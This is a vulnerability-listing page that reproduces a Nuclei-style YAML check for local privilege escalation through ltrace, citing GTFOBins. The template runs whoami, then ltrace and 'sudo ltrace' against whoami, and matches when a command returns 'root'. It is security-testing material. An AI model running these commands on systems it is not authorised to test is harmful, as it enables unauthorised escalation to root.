privesc-ltrace: ltrace - Privilege Escalation

日期: 2025-08-01 | 影响软件: ltrace | POC: 已公开

漏洞描述

ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.

PoC代码[已公开]

id: privesc-ltrace

info:
  name: ltrace - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.
  reference:
    - https://gtfobins.github.io/gtfobins/ltrace/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,ltrace,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      ltrace -b -L whoami

  - engine:
      - sh
      - bash
    source: |
      sudo ltrace -b -L whoami

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022077922ad21616e3942ba716a7c2bd2c9f3c6f483be29af7f0b76110b3955dd7e7022100b599bf979ea509d5ac2ad3fe5f7c42da158fbd094da97ff1a9c532ad116aefd6:922c64590222798bb761d5b6d8e72950